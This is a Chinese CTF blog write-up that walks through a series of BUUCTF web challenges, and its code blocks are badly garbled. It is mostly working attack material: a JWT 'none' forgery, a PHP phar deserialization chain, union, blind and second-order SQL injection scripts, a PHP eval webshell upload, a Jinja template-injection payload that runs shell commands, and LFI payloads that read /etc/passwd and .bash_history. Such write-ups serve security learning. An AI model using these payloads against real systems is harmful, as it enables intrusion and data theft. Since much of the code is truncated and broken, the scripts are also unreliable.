1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 #http: { : async (ctx, next) => { { username, password} = ctx.request.body;{ , 'wrong username');} 100000 ) { [ ] ;} 18 ).toString('hex');{ secretid, username, password} , secret, { algorithm: 'HS256'} );{ : token} );} , : async (ctx, next) => { { username, password} = ctx.request.body;{ , 'username or password is necessary');} [ 1 ] , 'base64').toString()).secretid;null 0 )) { , 'no such secret id');} [ sid] ;, secret, { algorithm: 'HS256'} );{ } { } );} , : async (ctx, next) => { { , 'permission denied');} { } );} , : async (ctx, next) => { null { : true } )} } ;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /api/login HTTP/1 .1 Host : 153 a07a4-67 b8-4116 -8 e03-c0761cafca45.node5.buuoj.cn:81 Origin : http://153 a07a4-67 b8-4116 -8 e03-c0761cafca45.node5.buuoj.cn:81 User -Agent: Mozilla/5 .0 (Windows NT 10 .0 ; Win64; x64) AppleWebKit/537 .36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537 .36 Edg/133.0.0.0 Accept : */*Content -Type: application/x-www-form-urlencoded; charset=UTF-8 Accept -Language: zh-CN,zh;q=0 .9 ,en;q=0 .8 ,en-GB;q=0 .7 ,en-US;q=0 .6 X -Requested-With: XMLHttpRequestReferer : http://153 a07a4-67 b8-4116 -8 e03-c0761cafca45.node5.buuoj.cn:81 /loginCookie : sses:aok=eyJ1c2VybmFtZSI6IjEyMyIsIl9leHBpcmUiOjE3NDA3NDg5NDAwNjQsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==Accept -Encoding: gzip, deflateContent -Length: 213 username =admin&password=123456 &authorization=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZWNyZXRpZCI6MCwidXNlcm5hbWUiOiIxMjMiLCJwYXNzd29yZCI6IjEyMyIsImlhdCI6MTc0MDY2MjUzNX0.P8eCh4XoYlQyjnOj2BBBFHTGCBbOEc7IUa8_OoLaJFY
1 2 3 4 5 6 7 8 9 10 11 12 import jwt"secretid" : [],"username" : "admin" ,"password" : "123456" ,"iat" : 1740662535 "none" , key="" ).encode(encoding='utf-8' )print (token)
抓包就能看到flag了
可以读文件,
1 http ://6 cf3582c-4 e4c-4 ab5-9 a23-88949 f6b04a1.node5.buuoj.cn:81 /file.php?file=class.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 222.90 .67.205 10.244 .244.85 <?php class C1e4r public $test ;public $str ;public function __construct ($name {$this ->str = $name ;public function __destruct ( {$this ->test = $this ->str;echo $this ->test;class Show public $source ;public $str ;public function __construct ($file {$this ->source = $file ; echo $this ->source;public function __toString ( {$content = $this ->str['str' ]->source;return $content ;public function __set ($key ,$value {$this ->$key = $value ;public function _show ( {if (preg_match ('/http|https|file:|gopher|dict|\.\.|f1ag/i' ,$this ->source)) {die ('hacker!' );else {highlight_file ($this ->source);public function __wakeup ( {if (preg_match ("/http|https|file:|gopher|dict|\.\./i" , $this ->source)) {echo "hacker~" ;$this ->source = "index.php" ;class Test public $file ;public $params ;public function __construct ( {$this ->params = array ();public function __get ($key {return $this ->get ($key );public function get ($key {if (isset ($this ->params[$key ])) {$value = $this ->params[$key ];else {$value = "index.php" ;return $this ->file_get ($value );public function file_get ($value {$text = base64_encode (file_get_contents ($value ));return $text ;?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 <?php class C1e4r public $test ;public $str ;class Show public $source ;public $str ;class Test public $file ;public $params ;public function __construct ( {$this ->params = array ('source' =>'/var/www/html/f1ag.php' );$c = new C1e4r ();$s =new Show ();$t =new Test ();$s ->source=$s ;$s ->str['str' ]=$t ;$c ->str=$s ;echo (serialize ($c ));$phar = new Phar ("exp.phar" ); $phar ->startBuffering ();$phar ->setStub ('<?php __HALT_COMPILER(); ? >' ); $phar ->setMetadata ($c ); $phar ->addFromString ("exp.txt" , "test" ); $phar ->stopBuffering ();?>
要求是图片,上传之后在upload里看
1 http://d7246a1f-9529-4706-a98c-7abee96d9090.node5.buuoj.cn:81/file.php?file=phar://upload/0630e6e9deaa1d2d476f851ab7b37724.jpg
得到之后base解码就可以了
1 1 ' union select database()#
1 1 ' union select group_concat(table_name) from information_schema.tables where table_schema=database()#
1 1 ' union select group_concat(column_name) from information_schema.columns where table_name=' flag'#
1 1 ' union select flag from flag#
看源码感觉是sql注入,robots.txt下载源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?phpinclude "config.php" ;$id =isset ($_GET ["id" ])?$_GET ["id" ]:"1" ;$path =isset ($_GET ["path" ])?$_GET ["path" ]:"" ;$id =addslashes ($id );$path =addslashes ($path );$id =str_replace (array ("\\0" ,"%00" ,"\\'" ,"'" ),"" ,$id );$path =str_replace (array ("\\0" ,"%00" ,"\\'" ,"'" ),"" ,$path );$result =mysqli_query ($con ,"select * from images where id='{$id} ' or path='{$path} '" );$row =mysqli_fetch_array ($result ,MYSQLI_ASSOC);$path ="./" . $row ["path" ];header ("Content-Type: image/jpeg" );readfile ($path );
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 import requestsf'http://92ccbb87-37f4-41ee-997a-ea7b050c8832.node5.buuoj.cn:81/image.php?id=\\0&path=' '' for i in range (1 , 50 ):32 , 127 while head < tail:2 f"or (ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=0x7573657273)),{i} ,1))>{mid} )--+" f"or (ascii(substr((select(group_concat(username,0x7e,password))from(users)),{i} ,1))>{mid} )--+" if 'JFIF' in r.text:1 else :2 chr (mid)print (flag)if head == 32 :break
知道密码后登录,然后传马
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 POST /upload.php HTTP/1.1"file" ; filename="<?= @eval($_POST ['cmd']);?>" eval ($_POST ['cmd' ]);?>"submit"
最后蚁剑连接
用bp简单fuzz一下看看
1 2 || length(database())> 100
检测完了,如果出NU1L说明为真,出现V&N为假
sys.schema_table_statistics_with_buffer 是 MySQL 中的一个系统视图,通常用于存储关于数据库中表的统计信息,特别是与查询优化相关的数据。这个视图包含了表的各种统计数据,如行数、索引大小、表的存储引擎等信息,通常由 MySQL 内部的查询优化器用来决定查询计划。
sys.x$schema_flattened_keys 是 MySQL 中的一个内部视图,主要用于显示数据库中表的键(key)信息,通常与表结构和索引相关。它属于 sys 库的一部分,sys 库是 MySQL 提供的一个用于收集系统级数据和诊断的特殊数据库。这个视图的作用是提供关于数据库中的键(如主键、外键、唯一索引等)的详细信息,通常用于数据库的性能调优和查询优化。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 import requests'http://a3a2eb96-6ded-4948-bd48-e46b6320dae7.node5.buuoj.cn:81/index.php' '' for i in range (1 , 500 ):32 , 127 while head <= tail:2 f"2||(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh ),{i} ,1))>{mid} )" 'id' : payload}if 'Nu1L' in r.text:1 else :1 2 chr (head)print (flag)if head == 32 :break
1 http://c67b8621-8868-4bd5-9238-bef8af2358d1.node5.buuoj.cn:81/?name={{7*7}}
1 http://c67b8621-8868 -4bd5-9238 -bef8af2358d1.node5.buuoj.cn:81 /?name={{cycler.next ['__g' 'lobals__' ].__builtins__.__import__ ('os' ).popen('cat flag.txt' ).read()}}
发现cookie值这边hash会变
根据提示md5(s e c r e t . secret.secret.name )===pass ,我们的hash值很有可能是md5(secret.$name),如果参数pass传入cookies里面的hash值,可能就会成功。
1 ?pass =576322 dd496b99d07b5b0f7fa7934a25&name =1
1 view-source:http://ae8c0a4f-c9dd-4db8-a848-a964c20de0c6.node5.buuoj.cn:81/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=flflflflag.php
1 2 3 4 5 6 7 8 <?php $file =$_GET ['file' ];if (preg_match ('/data|input|zip/is' ,$file )){die ('nonono' );include ($file );echo 'include($_GET["file"])' ;?>
扫一下
1 http://ae8c0a4f-c9dd-4db8-a848-a964c20de0c6.node5.buuoj.cn:81/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=dir.php
1 2 3 <?php var_dump (scandir ('/tmp' ));?>
1 2 3 4 5 6 import requestsfrom io import BytesIO"<?php phpinfo()?>" 'file' : BytesIO(payload.encode()) }"http://ae8c0a4f-c9dd-4db8-a848-a964c20de0c6.node5.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd" False )
去dir.php看一下具体文件
1 ae8 c 0 a4 f-c 9 dd-4 db8 -a848 -a964 c 20 de0 c 6 .node5 .buuoj.cn:81 /flflflflag.php?file= /tmp/phpiEiNTa
搜一下flag{
利用php7 segment fault特性(CVE-2018-14884)
1 sqlquery : select * from users where username= '' and passwd= ''
测了半天没测出来,看看wp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /index.php HTTP/1.1
%00这是一个 NULL 字符 ,用于终止字符串。在一些数据库系统中,%00 会终止字符串处理,通常用来避开某些字符串长度检查。
可以发现跳转到welcome.php了
看一下robots.txt,里面指向hint.txt
1 2 3 4 5 6 $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i" ;$_POST ['passwd' ] === admin's password, Then you will get the flag;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 import requestsfrom urllib import parseimport string'http://2c767a3f-d8ee-4bfd-8111-79eadee4bde4.node5.buuoj.cn:81/' 0 '' '_' for i in range (1 ,60 ):if num == 1 :break for j in string:"username" :"\\" ,"passwd" :"||/**/passwd/**/regexp/**/\"^{}\";{}" .format ((result+j),parse.unquote('%00' ))print (result+j)if 'welcome' in res.text:break if j=='_' and 'welcome' not in res.text:break
1 you_will_never_know7788990
主要考察的是使用regexp的使用,也好长时间没用了
开头有一个评论,感觉是xss,然后会跳转到登录界面,测不出来
1 githacker --url http://50b0e8c8-0669-4fc4-aeed-5430015dcb71.node5.buuoj.cn/.git/ --output-folder result
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 <?php include "mysql.php" ;session_start ();if ($_SESSION ['login' ] != 'yes' ){header ("Location: ./login.php" );die ();if (isset ($_GET ['do' ])){switch ($_GET ['do' ])case 'write' :break ;case 'comment' :break ;default :header ("Location: ./index.php" );else {header ("Location: ./index.php" );?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 C:\Users\0 raN9e\Desktop\tools\Web\GitHacker\result\07 f8a4d8e6b1788fdff7d35b1a207e38>git log --all 5556 e3a11 22 :51 :17 2018 +0800 5556 e3ad3f21a0cf5938e26985a04ce3aa73faaf11 22 :51 :17 2018 +0800 11 22 :47 :29 2018 +0800 0 raN9e\Desktop\tools\Web\GitHacker\result\07 f8a4d8e6b1788fdff7d35b1a207e38>git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 <?php include "mysql.php" ;session_start ();if ($_SESSION ['login' ] != 'yes' ){header ("Location: ./login.php" );die ();if (isset ($_GET ['do' ])){switch ($_GET ['do' ])case 'write' :$category = addslashes ($_POST ['category' ]);$title = addslashes ($_POST ['title' ]);$content = addslashes ($_POST ['content' ]);$sql = "insert into board set category = '$category ', title = '$title ', content = '$content '" ;$result = mysql_query ($sql );header ("Location: ./index.php" );break ;case 'comment' :$bo_id = addslashes ($_POST ['bo_id' ]);$sql = "select category from board where id='$bo_id '" ;$result = mysql_query ($sql );$num = mysql_num_rows ($result );if ($num >0 ){$category = mysql_fetch_array ($result )['category' ];$content = addslashes ($_POST ['content' ]);$sql = "insert into comment set category = '$category ', content = '$content ', bo_id = '$bo_id '" ;$result = mysql_query ($sql );header ("Location: ./comment.php?id=$bo_id " );break ;default :header ("Location: ./index.php" );else {header ("Location: ./index.php" );?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 POST /login.php HTTP/1.1
测试666是答案
然后测了sql注入,去看了看wp,emmm有点ex这题
1 2 3 4 $sql = "insert into comment set category = '$category ', content = '$content ', bo_id = '$bo_id '" ;
1 title =2 &category=a',content=(select database()),/*&content=111
结果会变成
1 2 3 4 $sql = "insert into commentset category = 'a' ,content=(select database ()),
然后在conment.php里输入
这样就拼接起来了
写入shell看看
1 title= 2 & category= a',content=select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/a.php/*&content=orange
没成功
.bash_history 是 Bash shell 中用于存储用户命令历史记录的文件。当你在终端中输入命令时,Bash 会将这些命令保存到内存中,并在会话结束时将它们写入 .bash_history 文件。
1 title =2 &category=a',content=(select (load_file("/etc/passwd" ))),/*&content=123
1 2 sync :x:4:65534:sync :/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false mysql:x:102:105:MySQL Server,,,:/var/lib/mysql:/bin/false www:x:500:500:www:/home/www:/bin/bash
1 title= 2 & category= a',content=(select (load_file("/home/www/.bash_history"))),/*&content=123
1 cd /tmp/ unzip html.zip rm -f html.zip cp -r html /var/www/ cd /var/www/html/ rm -f .DS_Store service apache2 start
1 title= 2 & category= a',content=(select (load_file("/tmp/html/.DS_Store"))),/*&content=123
1 �Bud1���� ������strapIl� bootstrapIlocblob�F(
由于文件太大,不能完全显示
1 title =2 &category=a',content=(select HEX(load_file("/tmp/html/.DS_Store" ))),/*&content=123
1 00000001427564310000100000000800000010000000040 A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1 f␀l␀a␀g␀_␀8␀9␀4␀6␀e␀1␀f␀f␀1␀e␀e␀3␀e␀4␀0␀f␀.␀p␀h␀p
1 title= 2 & category= a',content=(select HEX(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*&content=123
1 2 3C3F7068700A0924666C61673D22666C61677B37323965663932662D326265332D346531632D623631382D6634303434303031323661627D223B0A3F3E0A-2 be3-4 e1c-b618-f404400126ab}
每次都需要在comment.php里面输入*/#进行拼接,最后得到flag,这题质量还是挺高的
有源码,先下载看看,能读取东西
1 http://85405268-ec05-4ab9-98c6-e9f007339cb8.node5.buuoj.cn:81/index.php?action=../../../etc/passwd
1 http ://85405268 -ec05-4 ab9-98 c6-e9f007339cb8.node5.buuoj.cn:81 /index.php?action=../../../flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 <?php error_reporting (0 );if (isset ($_GET ['source' ])) {show_source (__FILE__ );exit ();function is_valid ($str $banword = ['\.\.' ,'(php|file|glob|data|tp|zip|zlib|phar):' ,'flag' $regexp = '/' . implode ('|' , $banword ) . '/i' ;if (preg_match ($regexp , $str )) {return false ;return true ;$body = file_get_contents ('php://input' );$json = json_decode ($body , true );if (is_valid ($body ) && isset ($json ) && isset ($json ['page' ])) {$page = $json ['page' ];$content = file_get_contents ($page );if (!$content || !is_valid ($content )) {$content = "<p>not found</p>\n" ;else {$content = '<p>invalid request</p>' ;$content = preg_replace ('/HarekazeCTF\{.+\}/i' , 'HarekazeCTF{<censored>}' , $content );echo json_encode (['content' => $content ]);
大题思路是读取吧
用unicode进行绕过
1 { "page" : "\u0070\u0068\u0070\u003A\u002F\u002F\u0066\u0069\u006C\u0074\u0065\u0072\u002F\u0063\u006F\u006E\u0076\u0065\u0072\u0074\u002E\u0062\u0061\u0073\u0065\u0036\u0034\u002D\u0065\u006E\u0063\u006F\u0064\u0065\u002F\u0072\u0065\u0073\u006F\u0075\u0072\u0063\u0065\u003D\u002F\u0066\u006C\u0061\u0067" }
典型的二次注入在register.php和login.php里反复横跳
好恶心
参考链接[网鼎杯2018]Unfinish解题,五分钟带你解题-CSDN博客 ,有点累按照这个思路来
先讲思路
先去注册,输入email,username,password,然后登录界面需要的是email和password,最后显示的是username,注入点是username
1 insert into tables values ('$email' ,'$username' ,'$password' )
所以需要注入中间这个点
通过数字拼接避免了 SQL 注入时常见的闭合引号问题。直接插入引号可能会破坏查询结构,但通过使用 + 运算符,攻击者可以操控查询,而不需要直接插入引号。
1 0 ' +(select ascii(database())) +' 0
测试一下
1 0 '+(select ascii(substr (database(),2,1)))+' 0
发现一下waf,过滤了逗号,information等
1 substr(database() from 2 for 1 ):这个部分会从数据库名称的第二个字符开始
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 import requestsimport timefrom bs4 import BeautifulSoup'http://fe499958-7c4c-48f3-a18a-78ec7d81f8c3.node5.buuoj.cn:81/' "register.php" "login.php" '' for i in range (1 , 50 ):f"0'+(ascii(substr((select * from flag) from {i} for 1)))+'0" "email" : f"{i} @163.com" ,"username" : payload,"password" : "1" "email" : f"{i} @163.com" ,"password" : "1" 'html.parser' )'span' , class_='user-name' )int (ans)if f == 0 :break chr (int (ans))print (flag)
网上都没讲好怎么爆表,都是直接猜的,我也顺从吧
1 2 http://7dbd6100-4acb-4408-8e1a-719e7725218f.node5.buuoj.cn:81/robots.txt
换了ua头没有显示
1 2 http ://7 dbd6100-4 acb-4408 -8 e1a-719 e7725218f.node5.buuoj.cn:81 /secretTell me your secret.I will encrypt it so others can't see
1 2 3 4 5 6 7 8 9 10 import requests"http://7dbd6100-4acb-4408-8e1a-719e7725218f.node5.buuoj.cn:81/secret?secret=" '' for i in range (1 , 500 ):str (i))print (ans)
没有头绪直接放大
1 http://7dbd6100-4acb-4408-8e1a-719e7725218f.node5.buuoj.cn:81/secret?secret=333333333333
1 2 3 4 5 6 7 8 9 10 11 File "/app/app.py" , line 35 , in secretif (secret==None ):return 'Tell me your secret.I will encrypt it so others can\'t see' "HereIsTreasure" ) if 'ciscn' in a.lower():return 'flag detected!' in this frame return a
注意python的版本是2.7,大体应该是通过这个rc4加密一下然后模板注入,前阵子看了zacarx师傅的fenjing配合食用的自己也写一个看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 from urllib.parse import quoteimport requestsfrom flask import Flask, requestdef rc4_main (key="init_key" , message="init_message" ):'' )print ("URL 编码结果:" , url_encoded)return url_encodeddef rc4_init_sbox (key ):list (range (256 ))0 len (key)for i in range (256 ):ord (key[i % key_length])) % 256 return s_boxdef rc4_excrypt (plain, box ):bytearray ()0 for s in plain:1 ) % 256 256 256 ord (s) ^ k)return res.decode('latin1' )'http://7dbd6100-4acb-4408-8e1a-719e7725218f.node5.buuoj.cn:81/secret?secret=' @app.route('/' , methods=['GET' ] def index ():'name' , '' )print ("接收到的payload:" , payload)"HereIsTreasure" , payload)print (url+ans)print ("返回结果:" , res_text)return res_textif __name__ == '__main__' :'0.0.0.0' , port=5000 , debug=False )
起个fenjing可以直接跑,本题主要由于waf少,如果waf多外加这个编码加密的话,这个脚本可能比较可食用
